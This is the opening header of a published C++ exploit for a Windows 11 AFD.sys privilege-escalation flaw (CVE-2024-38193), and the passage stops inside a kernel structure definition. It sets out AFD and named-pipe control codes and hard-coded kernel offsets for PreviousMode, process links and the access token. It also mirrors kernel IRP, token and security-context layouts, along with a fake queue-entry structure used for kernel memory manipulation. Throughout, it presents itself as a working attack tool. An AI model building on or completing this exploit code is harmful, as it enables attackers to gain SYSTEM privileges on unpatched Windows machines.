
# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
|
|
# Date: 2025-05-05
|
|
# Exploit Author: Milad Karimi (Ex3ptionaL)
|
|
# Contact: miladgrayhat@gmail.com
|
|
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
|
|
# Tested on: Win x64
|
|
# CVE : CVE-2024-38193
|
|
|
|
#pragma once
|
|
|
|
#include "ntstatus.h"
|
|
#include "Windows.h"
|
|
#include <iostream>
|
|
|
|
#pragma comment(lib, "ntdll.lib")

// Split a 64-bit value into its 32-bit halves. Both macros cast through
// DWORDLONG first, so a negative signed argument is zero-extended rather
// than sign-extended before the split.
#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((DWORD)((DWORDLONG)(l)))

// Extended-attribute name carried on an AFD create request, the AFD device
// path and the loopback literal. AfdOpenPacket is exactly 15 characters, the
// same as the CHAR EaName[15] field of _AFD_CREATE_PACKET below, so that
// field has no room for the terminating NUL (see the note there).
#define AfdOpenPacket "AfdOpenPacketXX"
#define AFD_DEVICE_NAME L"\\Device\\Afd"
#define LOCALHOST "127.0.0.1"

// Control codes for AFD and named-pipe requests; the call sites are not in
// this chunk. Style note: every value except FSCTL_PIPE_INTERNAL_WRITE is
// spelled with an LL suffix, so that one constant has type int while the
// others are long long.
#define IOCTL_AFD_BIND 0x12003LL
#define IOCTL_AFD_LISTEN 0x1200BLL
#define IOCTL_AFD_CONNECT 0x120BBLL
#define IOCTL_AFD_GET_SOCK_NAME 0x1202FLL
#define FSCTL_PIPE_PEEK 0x11400CLL
#define FSCTL_PIPE_IMPERSONATE 0x11001CLL
#define FSCTL_PIPE_INTERNAL_WRITE 0x119FF8

// Object-attribute / create-disposition constants and the NT_SUCCESS test,
// re-declared locally because only Windows.h is included. winternl.h declares
// the same names; including both would produce redefinition errors.
#define OBJ_CASE_INSENSITIVE 0x00000040
#define OBJ_INHERIT 0x00000002
#define FILE_OPEN_IF 0x3
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)

// Hard-coded field offsets into kernel objects. They are only meaningful for
// the single build this file targets (see the "Tested on" line in the file
// header); on any other build they address unrelated memory and nothing here
// detects that. The OFFSET_IN_TOKEN_* values agree with the offset
// annotations on struct _TOKEN later in this file (Privileges 0x40,
// PrimaryGroup 0xa8, DynamicPart 0xb0, DefaultDacl 0xb8, VariablePart 0x490).
// PREVIOUS_MODE_OFFSET and the OFFSET_TO_* values refer to structures that
// are not declared in this file (presumably KTHREAD and EPROCESS) — verify
// against the target build's symbols.
#define OFFSET_IN_TOKEN_VARIABLEPART 0x490
#define OFFSET_IN_TOKEN_TOKEN_PRIVILEGES 0x40
#define OFFSET_IN_TOKEN_PRIMARY_GROUP 0xA8
#define OFFSET_IN_TOKEN_DYNAMIC_PART 0xB0
#define OFFSET_IN_TOKEN_DEFAULT_DACL 0xB8
#define PREVIOUS_MODE_OFFSET 0x232
#define OFFSET_TO_ACTIVE_PROCESS_LINKS 0x448
#define OFFSET_TO_TOKEN 0x4b8

// Pseudo-handle for the calling thread ((HANDLE)-2, the value that
// GetCurrentThread returns); it is never closed.
#define CURRENT_THREAD (HANDLE)0xFFFFFFFFFFFFFFFE
|
|
|
|
|
|
// Local copy of the native IO_STATUS_BLOCK (0x10 bytes on x64, used at
// offset 0x30 of _IRP below). Information is declared DWORD* where the SDK
// uses ULONG_PTR; both are pointer-sized so the layout is unchanged, but
// the SDK field is a count, not an address. The leading `typedef` has no
// declarator and so introduces no alias; the type is referred to as
// `struct IO_STATUS_BLOCK`.
typedef struct IO_STATUS_BLOCK
{
    union
    {
        DWORD Status;
        PVOID Pointer;
    };

    DWORD* Information;
};
|
|
|
|
//0x4 bytes (sizeof)
// Kernel power-state context, viewed either as packed bit-fields or as one
// ULONG (ContextAsUlong). The bit-field widths sum to 32, so the two views
// cover exactly the same 4 bytes.
struct _SYSTEM_POWER_STATE_CONTEXT
{
    union
    {
        struct
        {
            ULONG Reserved1 : 8; //0x0
            ULONG TargetSystemState : 4; //0x0
            ULONG EffectiveSystemState : 4; //0x0
            ULONG CurrentSystemState : 4; //0x0
            ULONG IgnoreHibernationPath : 1; //0x0
            ULONG PseudoTransition : 1; //0x0
            ULONG KernelSoftReboot : 1; //0x0
            ULONG DirectedDripsTransition : 1; //0x0
            ULONG Reserved2 : 8; //0x0
        };
        ULONG ContextAsUlong; //0x0
    };
};
|
|
|
|
//0x4 bytes (sizeof)
// Either a system or a device power state; both enum tags come from the
// SDK (winnt.h) via Windows.h.
union _POWER_STATE
{
    enum _SYSTEM_POWER_STATE SystemState; //0x0
    enum _DEVICE_POWER_STATE DeviceState; //0x0
};
|
|
|
|
//0x48 bytes (sizeof)
// Mirror of the kernel I/O stack location as dumped from symbols; the
// trailing //0xNN comments are the field offsets from that dump and the
// layout must stay byte-identical for them to hold. Parameters is a 0x20-byte
// union at 0x8 selected by MajorFunction/MinorFunction. Several member types
// (_IO_SECURITY_CONTEXT, _FILE_OBJECT, _VPB, ...) are never declared in this
// file; they are only used through pointers, which is sufficient.
// NOTE(review): the struct is assumed to match the build named in the file
// header — no check here verifies that.
typedef struct _IO_STACK_LOCATION
{
    UCHAR MajorFunction; //0x0
    UCHAR MinorFunction; //0x1
    UCHAR Flags; //0x2
    UCHAR Control; //0x3
    union
    {
        // IRP_MJ_CREATE
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT FileAttributes; //0x18
            USHORT ShareAccess; //0x1a
            ULONG EaLength; //0x20
        } Create; //0x8
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _NAMED_PIPE_CREATE_PARAMETERS* Parameters; //0x20
        } CreatePipe; //0x8
        struct
        {
            struct _IO_SECURITY_CONTEXT* SecurityContext; //0x8
            ULONG Options; //0x10
            USHORT Reserved; //0x18
            USHORT ShareAccess; //0x1a
            struct _MAILSLOT_CREATE_PARAMETERS* Parameters; //0x20
        } CreateMailslot; //0x8
        // Read and Write share one shape.
        struct
        {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Read; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG Key; //0x10
            ULONG Flags; //0x14
            union _LARGE_INTEGER ByteOffset; //0x18
        } Write; //0x8
        struct
        {
            ULONG Length; //0x8
            struct _UNICODE_STRING* FileName; //0x10
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18
            ULONG FileIndex; //0x20
        } QueryDirectory; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
        } NotifyDirectory; //0x8
        struct
        {
            ULONG Length; //0x8
            ULONG CompletionFilter; //0x10
            enum _DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass; //0x18
        } NotifyDirectoryEx; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
        } QueryFile; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10
            struct _FILE_OBJECT* FileObject; //0x18
            union
            {
                struct
                {
                    UCHAR ReplaceIfExists; //0x20
                    UCHAR AdvanceOnly; //0x21
                };
                ULONG ClusterCount; //0x20
                VOID* DeleteHandle; //0x20
            };
        } SetFile; //0x8
        struct
        {
            ULONG Length; //0x8
            VOID* EaList; //0x10
            ULONG EaListLength; //0x18
            ULONG EaIndex; //0x20
        } QueryEa; //0x8
        struct
        {
            ULONG Length; //0x8
        } SetEa; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } QueryVolume; //0x8
        struct
        {
            ULONG Length; //0x8
            enum _FSINFOCLASS FsInformationClass; //0x10
        } SetVolume; //0x8
        // FileSystemControl and DeviceIoControl differ only in the name of
        // the control-code field.
        struct
        {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG FsControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } FileSystemControl; //0x8
        struct
        {
            union _LARGE_INTEGER* Length; //0x8
            ULONG Key; //0x10
            union _LARGE_INTEGER ByteOffset; //0x18
        } LockControl; //0x8
        struct
        {
            ULONG OutputBufferLength; //0x8
            ULONG InputBufferLength; //0x10
            ULONG IoControlCode; //0x18
            VOID* Type3InputBuffer; //0x20
        } DeviceIoControl; //0x8
        struct
        {
            ULONG SecurityInformation; //0x8
            ULONG Length; //0x10
        } QuerySecurity; //0x8
        struct
        {
            ULONG SecurityInformation; //0x8
            VOID* SecurityDescriptor; //0x10
        } SetSecurity; //0x8
        struct
        {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } MountVolume; //0x8
        struct
        {
            struct _VPB* Vpb; //0x8
            struct _DEVICE_OBJECT* DeviceObject; //0x10
        } VerifyVolume; //0x8
        struct
        {
            struct _SCSI_REQUEST_BLOCK* Srb; //0x8
        } Scsi; //0x8
        struct
        {
            ULONG Length; //0x8
            VOID* StartSid; //0x10
            struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18
            ULONG SidListLength; //0x20
        } QueryQuota; //0x8
        struct
        {
            ULONG Length; //0x8
        } SetQuota; //0x8
        // PnP minor functions
        struct
        {
            enum _DEVICE_RELATION_TYPE Type; //0x8
        } QueryDeviceRelations; //0x8
        struct
        {
            struct _GUID* InterfaceType; //0x8
            USHORT Size; //0x10
            USHORT Version; //0x12
            struct _INTERFACE* Interface; //0x18
            VOID* InterfaceSpecificData; //0x20
        } QueryInterface; //0x8
        struct
        {
            struct _DEVICE_CAPABILITIES* Capabilities; //0x8
        } DeviceCapabilities; //0x8
        struct
        {
            struct _IO_RESOURCE_REQUIREMENTS_LIST* IoResourceRequirementList; //0x8
        } FilterResourceRequirements; //0x8
        struct
        {
            ULONG WhichSpace; //0x8
            VOID* Buffer; //0x10
            ULONG Offset; //0x18
            ULONG Length; //0x20
        } ReadWriteConfig; //0x8
        struct
        {
            UCHAR Lock; //0x8
        } SetLock; //0x8
        struct
        {
            enum BUS_QUERY_ID_TYPE IdType; //0x8
        } QueryId; //0x8
        struct
        {
            enum DEVICE_TEXT_TYPE DeviceTextType; //0x8
            ULONG LocaleId; //0x10
        } QueryDeviceText; //0x8
        struct
        {
            UCHAR InPath; //0x8
            UCHAR Reserved[3]; //0x9
            enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10
        } UsageNotification; //0x8
        // Power minor functions
        struct
        {
            enum _SYSTEM_POWER_STATE PowerState; //0x8
        } WaitWake; //0x8
        struct
        {
            struct _POWER_SEQUENCE* PowerSequence; //0x8
        } PowerSequence; //0x8
        struct
        {
            union
            {
                ULONG SystemContext; //0x8
                struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext; //0x8
            };
            enum _POWER_STATE_TYPE Type; //0x10
            union _POWER_STATE State; //0x18
            enum POWER_ACTION ShutdownType; //0x20
        } Power; //0x8
        struct
        {
            struct _CM_RESOURCE_LIST* AllocatedResources; //0x8
            struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10
        } StartDevice; //0x8
        struct
        {
            ULONGLONG ProviderId; //0x8
            VOID* DataPath; //0x10
            ULONG BufferSize; //0x18
            VOID* Buffer; //0x20
        } WMI; //0x8
        // Generic view: four pointer-sized arguments overlaying the union.
        struct
        {
            VOID* Argument1; //0x8
            VOID* Argument2; //0x10
            VOID* Argument3; //0x18
            VOID* Argument4; //0x20
        } Others; //0x8
    } Parameters; //0x8
    struct _DEVICE_OBJECT* DeviceObject; //0x28
    struct _FILE_OBJECT* FileObject; //0x30
    LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2, VOID* arg3); //0x38
    VOID* Context; //0x40
}IO_STACK_LOCATION;
|
|
|
|
//0x18 bytes (sizeof)
// Device-queue link record; overlays DriverContext[4] inside _IRP::Tail.
// _LIST_ENTRY is the SDK type from winnt.h.
struct _KDEVICE_QUEUE_ENTRY
{
    struct _LIST_ENTRY DeviceListEntry; //0x0
    ULONG SortKey; //0x10
    UCHAR Inserted; //0x14
};
|
|
|
|
//0x58 bytes (sizeof)
// Kernel APC object as laid out in the symbol dump; it overlays
// _IRP::Tail at 0x78. Reserved[3] at 0x20 stands in for the three routine
// pointers the kernel keeps there. Offsets must stay as annotated.
struct _KAPC
{
    UCHAR Type; //0x0
    UCHAR AllFlags; //0x1
    UCHAR Size; //0x2
    UCHAR SpareByte1; //0x3
    ULONG SpareLong0; //0x4
    struct _KTHREAD* Thread; //0x8
    struct _LIST_ENTRY ApcListEntry; //0x10
    VOID* Reserved[3]; //0x20
    VOID* NormalContext; //0x38
    VOID* SystemArgument1; //0x40
    VOID* SystemArgument2; //0x48
    CHAR ApcStateIndex; //0x50
    CHAR ApcMode; //0x51
    UCHAR Inserted; //0x52
};
|
|
//0xd0 bytes (sizeof)
// Mirror of the kernel I/O request packet from the symbol dump. Two
// different status-block tags are used: IoStatus at 0x30 is the local
// `struct IO_STATUS_BLOCK` defined above, while UserIosb / UserApcRoutine
// refer to `struct _IO_STATUS_BLOCK`, a tag that is never defined in this
// file. That compiles because those uses are pointers only, but the two
// names do not denote the same type. Tail at 0x78 overlays the Overlay
// record, a _KAPC and a completion key.
struct _IRP
{
    SHORT Type; //0x0
    USHORT Size; //0x2
    USHORT AllocationProcessorNumber; //0x4
    USHORT Reserved; //0x6
    struct _MDL* MdlAddress; //0x8
    ULONG Flags; //0x10
    union
    {
        struct _IRP* MasterIrp; //0x18
        LONG IrpCount; //0x18
        VOID* SystemBuffer; //0x18
    } AssociatedIrp; //0x18
    struct _LIST_ENTRY ThreadListEntry; //0x20
    struct IO_STATUS_BLOCK IoStatus; //0x30
    CHAR RequestorMode; //0x40
    UCHAR PendingReturned; //0x41
    CHAR StackCount; //0x42
    CHAR CurrentLocation; //0x43
    UCHAR Cancel; //0x44
    UCHAR CancelIrql; //0x45
    CHAR ApcEnvironment; //0x46
    UCHAR AllocationFlags; //0x47
    union
    {
        struct _IO_STATUS_BLOCK* UserIosb; //0x48
        VOID* IoRingContext; //0x48
    };
    struct _KEVENT* UserEvent; //0x50
    union
    {
        struct
        {
            union
            {
                VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK* arg2, ULONG arg3); //0x58
                VOID* IssuingProcess; //0x58
            };
            union
            {
                VOID* UserApcContext; //0x60
                struct _IORING_OBJECT* IoRing; //0x60
            };
        } AsynchronousParameters; //0x58
        union _LARGE_INTEGER AllocationSize; //0x58
    } Overlay; //0x58
    VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x68
    VOID* UserBuffer; //0x70
    union
    {
        struct
        {
            union
            {
                struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78
                VOID* DriverContext[4]; //0x78
            };
            struct _ETHREAD* Thread; //0x98
            CHAR* AuxiliaryBuffer; //0xa0
            struct _LIST_ENTRY ListEntry; //0xa8
            union
            {
                struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8
                ULONG PacketType; //0xb8
            };
            struct _FILE_OBJECT* OriginalFileObject; //0xc0
            VOID* IrpExtension; //0xc8
        } Overlay; //0x78
        struct _KAPC Apc; //0x78
        VOID* CompletionKey; //0x78
    } Tail; //0x78
};
|
|
// TDI-style transport address: a length/type header followed by
// AddressLength bytes. Address[1] is a placeholder for variable-length
// data, so sizeof(TA_ADDRESS) does not describe a real instance.
typedef struct _TA_ADDRESS
{
    USHORT AddressLength;
    USHORT AddressType;
    UCHAR Address[1];
}TA_ADDRESS;
|
|
|
|
// Counted list of TA_ADDRESS records. Address[1] is again a placeholder;
// the real length depends on TAAddressCount and each record's
// AddressLength.
typedef struct _TRANSPORT_ADDRESS
{
    LONG TAAddressCount;
    TA_ADDRESS Address[1];
}TRANSPORT_ADDRESS;
|
|
|
|
// Native counted string. Length and MaximumLength are byte counts, not
// character counts, and Buffer need not be NUL-terminated. winternl.h
// declares the same typedef; including both would be a redefinition.
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
|
|
|
|
// Native object-attributes block passed to Nt* create/open calls. Length is
// expected to be sizeof(OBJECT_ATTRIBUTES); Attributes takes the OBJ_*
// flags defined at the top of this file. Also declared by winternl.h.
typedef struct _OBJECT_ATTRIBUTES
{
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;
    PVOID SecurityQualityOfService;
}OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
|
|
|
|
// One loaded-module record as returned for SystemModuleInformation.
// FullPathName is a fixed 256-byte ANSI buffer; OffsetToFileName is the
// index into it where the bare file name starts.
typedef struct _SYSTEM_MODULE_ENTRY
{
    HANDLE Section;
    PVOID MappedBase;
    PVOID ImageBase;
    ULONG ImageSize;
    ULONG Flags;
    USHORT LoadOrderIndex;
    USHORT InitOrderIndex;
    USHORT LoadCount;
    USHORT OffsetToFileName;
    UCHAR FullPathName[256];
} SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY;
|
|
|
|
// Header for the SystemModuleInformation buffer: Count entries follow
// inline. Module[1] is a placeholder, so the buffer must be sized from
// Count, not from sizeof.
typedef struct _SYSTEM_MODULE_INFORMATION
{
    ULONG Count;
    SYSTEM_MODULE_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION;
|
|
|
|
// One handle record as returned for SystemExtendedHandleInformation.
// Object is the kernel-mode address of the object behind the handle, which
// is why access to this information class is restricted on hardened
// configurations.
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX
{
    PVOID Object;
    ULONG_PTR UniqueProcessId;
    ULONG_PTR HandleValue;
    ULONG GrantedAccess;
    USHORT CreatorBackTraceIndex;
    USHORT ObjectTypeIndex;
    ULONG HandleAttributes;
    ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
|
|
|
|
// Header for the SystemExtendedHandleInformation buffer; NumberOfHandles
// records follow inline. Handles[1] is a placeholder — size the buffer from
// NumberOfHandles.
typedef struct _SYSTEM_HANDLE_INFORMATION_EX
{
    ULONG_PTR NumberOfHandles;
    ULONG_PTR Reserved;
    SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
|
|
|
|
// Extended-attribute record for an AFD create request: a
// FILE_FULL_EA_INFORMATION header immediately followed by the AFD create
// packet that forms the EA value.
// NOTE(review): the SDK's FILE_FULL_EA_INFORMATION declares Flags and
// EaNameLength as two adjacent UCHARs; here Flags is a WORD, which shifts
// EaNameLength, EaValueLength and EaName relative to the SDK layout —
// confirm that is intentional. EaName[15] is exactly the length of
// AfdOpenPacket, leaving no room for a terminating NUL inside the field;
// whether a terminator lands in the alignment padding before EndpointFlags
// depends on how the caller fills it.
typedef struct _AFD_CREATE_PACKET {
    //FILE_FULL_EA_INFORMATION
    ULONG NextEntryOffset;
    WORD Flags;
    UCHAR EaNameLength;
    USHORT EaValueLength;
    CHAR EaName[15];

    //AFD_CREATE_PACKET
    ULONG EndpointFlags;
    ULONG GroupID;
    ULONG AddressFamily;
    ULONG SocketType;
    ULONG Protocol;
    ULONG SizeOfTransportName;
    wchar_t TransportName[16];
    //UCHAR Unkown;
} AFD_CREATE_PACKET;
|
|
|
|
// Only the one information class this program needs. winternl.h declares an
// enum of the same name, so the two headers cannot be included together.
enum THREADINFOCLASS { ThreadImpersonationToken = 5 };
|
|
|
|
// The two NtQuerySystemInformation classes used by this program; values are
// the public ones. winternl.h declares an enum of the same name (clash if
// both are included).
enum SYSTEM_INFORMATION_CLASS {
    SystemModuleInformation = 11,
    SystemExtendedHandleInformation = 64
};
|
|
|
|
// Event kinds for native event creation (NotificationEvent = 0,
// SynchronizationEvent = 1, as in ntdef.h). The `typedef` has no declarator
// and so defines no alias; the enum is used by its tag.
typedef enum EVENT_TYPE {
    NotificationEvent,
    SynchronizationEvent
};
|
|
|
|
// Input buffer for IOCTL_AFD_BIND: a share-type ULONG followed by the
// IPv4 socket address. SOCKADDR_IN comes from the winsock headers pulled in
// through Windows.h (not available if WIN32_LEAN_AND_MEAN is defined).
typedef struct _AFD_BIND_DATA {
    ULONG ShareType;
    SOCKADDR_IN addr;
} AFD_BIND_DATA, * PAFD_BIND_DATA;
|
|
|
|
// Input buffer for IOCTL_AFD_CONNECT as this program lays it out. alignas(16)
// is C++11, so this header is C++-only. Field meanings beyond the names
// (UseSan, a socket handle, a constant 16, the target address) are not
// visible in this chunk. The member named `bind` shadows the winsock
// function only inside this scope. The `typedef` has no declarator; the
// type is used by its tag.
typedef struct alignas(16) MY_AFD_CONNECT_INFO
{
    __int64 UseSan;
    __int64 hNtSock1;
    __int64 Unknown;
    __int32 tmp6;
    WORD const_16;
    sockaddr_in bind;
};
|
|
|
|
|
|
// Program-defined record with a LIST_ENTRY link at offset 8 (4 bytes of
// padding follow `tmp`), a pointer slot for a security client context, a
// size field and a ~480 KiB inline payload buffer. Because of DATA's size an
// instance belongs on the heap, not the stack. The `typedef` has no
// declarator; the type is used by its tag.
typedef struct FAKE_DATA_ENTRY_QUEUE
{
    DWORD tmp;
    LIST_ENTRY nextQueue;
    __int64 unknown;
    PVOID security_client_context;
    __int64 unknown2;
    __int64 sizeOfData;
    char DATA[0x77FD0];
};
|
|
|
|
// Input buffer for IOCTL_AFD_LISTEN. MaximumConnectionQueue is 8-byte
// aligned, so 4 bytes of padding sit after `unknown` and sizeof is 16.
typedef struct _AFD_LISTEN_INFO {

    ULONG unknown;
    __int64 MaximumConnectionQueue;
} AFD_LISTEN_INFO, * PAFD_LISTEN_INFO;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// Kernel security client context (what SeCreateClientSecurity fills in).
// _SECURITY_QUALITY_OF_SERVICE and _TOKEN_CONTROL are the SDK types from
// winnt.h; ClientToken is a kernel token object pointer.
typedef struct _SECURITY_CLIENT_CONTEXT
{
    _SECURITY_QUALITY_OF_SERVICE SecurityQos;
    void* ClientToken;
    unsigned __int8 DirectlyAccessClientToken;
    unsigned __int8 DirectAccessEffectiveOnly;
    unsigned __int8 ServerIsRemote;
    _TOKEN_CONTROL ClientTokenControl;
}SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT;
|
|
|
|
// ERESOURCE owner slot (0x10 bytes with the 8-byte alignment). `___u1`
// stands for the kernel's anonymous count/flags union. Style note: names
// containing a double underscore are reserved for the implementation.
struct __declspec(align(8)) _OWNER_ENTRY
{
    unsigned __int64 OwnerThread;
    DWORD ___u1;
};
|
|
|
|
|
|
//0x68 bytes (sizeof)
// Executive resource lock as laid out in the symbol dump (the _TOKEN below
// points at one through TokenLock). The anonymous unions at 0x1a and 0x58
// keep the annotated offsets; SpinLock at 0x60 closes the 0x68 size.
typedef struct _ERESOURCE
{
    struct _LIST_ENTRY SystemResourcesList; //0x0
    struct _OWNER_ENTRY* OwnerTable; //0x10
    SHORT ActiveCount; //0x18
    union
    {
        USHORT Flag; //0x1a
        struct
        {
            UCHAR ReservedLowFlags; //0x1a
            UCHAR WaiterPriority; //0x1b
        };
    };
    VOID* SharedWaiters; //0x20
    VOID* ExclusiveWaiters; //0x28
    struct _OWNER_ENTRY OwnerEntry; //0x30
    ULONG ActiveEntries; //0x40
    ULONG ContentionCount; //0x44
    ULONG NumberOfSharedWaiters; //0x48
    ULONG NumberOfExclusiveWaiters; //0x4c
    VOID* Reserved2; //0x50
    union
    {
        VOID* Address; //0x58
        ULONGLONG CreatorBackTraceIndex; //0x58
    };
    ULONGLONG SpinLock; //0x60
}ERESOURCE, *PERESOURCE;
|
|
|
|
//0x8 bytes (sizeof)
// Executive push lock: one 64-bit word viewed as flag bits (1+1+1+1+60 = 64),
// as a plain value, or as a pointer. The `typedef` has no declarator; the
// type is used as `struct _EX_PUSH_LOCK`.
typedef struct _EX_PUSH_LOCK
{
    union
    {
        struct
        {
            ULONGLONG Locked : 1; //0x0
            ULONGLONG Waiting : 1; //0x0
            ULONGLONG Waking : 1; //0x0
            ULONGLONG MultipleShared : 1; //0x0
            ULONGLONG Shared : 60; //0x0
        };
        ULONGLONG Value; //0x0
        VOID* Ptr; //0x0
    };
};
|
|
|
|
//0x10 bytes (sizeof)
// Push-lock-protected hash table reference used inside
// _SEP_LOGON_SESSION_REFERENCES. _RTL_DYNAMIC_HASH_TABLE is never declared
// here (pointer use only). The `typedef` has no declarator.
typedef struct _SEP_CACHED_HANDLES_TABLE
{
    struct _EX_PUSH_LOCK Lock; //0x0
    struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8
};
|
|
|
|
//0x8 bytes (sizeof)
// Rundown reference: one word that is either a count or a pointer.
// The `typedef` has no declarator; the type is used by its tag.
typedef struct _EX_RUNDOWN_REF
{
    union
    {
        ULONGLONG Count; //0x0
        VOID* Ptr; //0x0
    };
};
|
|
|
|
//0x20 bytes (sizeof)
// Handle-revocation bookkeeping embedded at 0x80 of
// _SEP_LOGON_SESSION_REFERENCES. The `typedef` has no declarator.
typedef struct _OB_HANDLE_REVOCATION_BLOCK
{
    struct _LIST_ENTRY RevocationInfos; //0x0
    struct _EX_PUSH_LOCK Lock; //0x10
    struct _EX_RUNDOWN_REF Rundown; //0x18
};
|
|
|
|
//0xc0 bytes (sizeof)
// Kernel logon-session record (what _TOKEN::LogonSession points at, though
// that field is declared void* there; struct mm below types it as this).
// _LUID and _UNICODE_STRING are declared elsewhere; _DEVICE_MAP,
// _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION and _EJOB are pointer-only.
// The `typedef` has no declarator; the type is used by its tag.
typedef struct _SEP_LOGON_SESSION_REFERENCES
{
    struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0
    struct _LUID LogonId; //0x8
    struct _LUID BuddyLogonId; //0x10
    LONGLONG ReferenceCount; //0x18
    ULONG Flags; //0x20
    struct _DEVICE_MAP* pDeviceMap; //0x28
    VOID* Token; //0x30
    struct _UNICODE_STRING AccountName; //0x38
    struct _UNICODE_STRING AuthorityName; //0x48
    struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58
    struct _EX_PUSH_LOCK SharedDataLock; //0x68
    struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes; //0x70
    struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78
    struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80
    struct _EJOB* ServerSilo; //0xa0
    struct _LUID SiblingAuthId; //0xa8
    struct _LIST_ENTRY TokenList; //0xb0
};
|
|
//0x30 bytes (sizeof)
// Token security-attribute lists (pointed to by _TOKEN::pSecurityAttributes
// and mirrored in struct mm). Each count is followed by 4 bytes of padding
// before its 8-byte-aligned LIST_ENTRY, giving the annotated offsets.
typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION
{
    ULONG SecurityAttributeCount; //0x0
    struct _LIST_ENTRY SecurityAttributesList; //0x8
    ULONG WorkingSecurityAttributeCount; //0x18
    struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20
}AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION;
|
|
|
|
//0x20 bytes (sizeof)
// Reference-counted block of SID values (see _TOKEN::TokenSidValues and
// _SEP_LOGON_SESSION_REFERENCES::SharedSidValues). SidValuesStart is kept
// as a ULONGLONG rather than an inline array.
typedef struct _SEP_SID_VALUES_BLOCK
{
    ULONG BlockLength; //0x0
    LONGLONG ReferenceCount; //0x8
    ULONG SidCount; //0x10
    ULONGLONG SidValuesStart; //0x18
}SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK;
|
|
|
|
//0x18 bytes (sizeof)
// Token privilege state as three 64-bit masks; sits at _TOKEN offset 0x40,
// matching OFFSET_IN_TOKEN_TOKEN_PRIVILEGES. Presumably one bit per
// privilege LUID — not verifiable from this file.
struct _SEP_TOKEN_PRIVILEGES
{
    ULONGLONG Present; //0x0
    ULONGLONG Enabled; //0x8
    ULONGLONG EnabledByDefault; //0x10
};
|
|
|
|
//0x1f bytes (sizeof)
// Per-token audit policy. PolicySetStatus at 0x1e implies AdtTokenPolicy is
// 30 bytes, which matches winnt.h's TOKEN_AUDIT_POLICY for the SDK's
// POLICY_AUDIT_SUBCATEGORY_COUNT — confirm against the SDK in use.
struct _SEP_AUDIT_POLICY
{
    struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0
    UCHAR PolicySetStatus; //0x1e
};
|
|
|
|
//0x498 bytes (sizeof)
// Kernel access-token object from the symbol dump. The annotated offsets of
// Privileges (0x40), PrimaryGroup (0xa8), DynamicPart (0xb0), DefaultDacl
// (0xb8) and VariablePart (0x490) are the ones the OFFSET_IN_TOKEN_* macros
// at the top of the file encode; changing either side without the other
// silently breaks that agreement. LogonSession is typed void* here although
// struct mm treats it as _SEP_LOGON_SESSION_REFERENCES*. _TOKEN_SOURCE,
// _LUID, _SID_AND_ATTRIBUTES(_HASH), _ACL and the _TOKEN_TYPE /
// _SECURITY_IMPERSONATION_LEVEL enums are SDK types from winnt.h; the
// remaining _SEP_* tags are pointer-only.
// NOTE(review): layout is specific to the build named in the file header.
struct _TOKEN
{
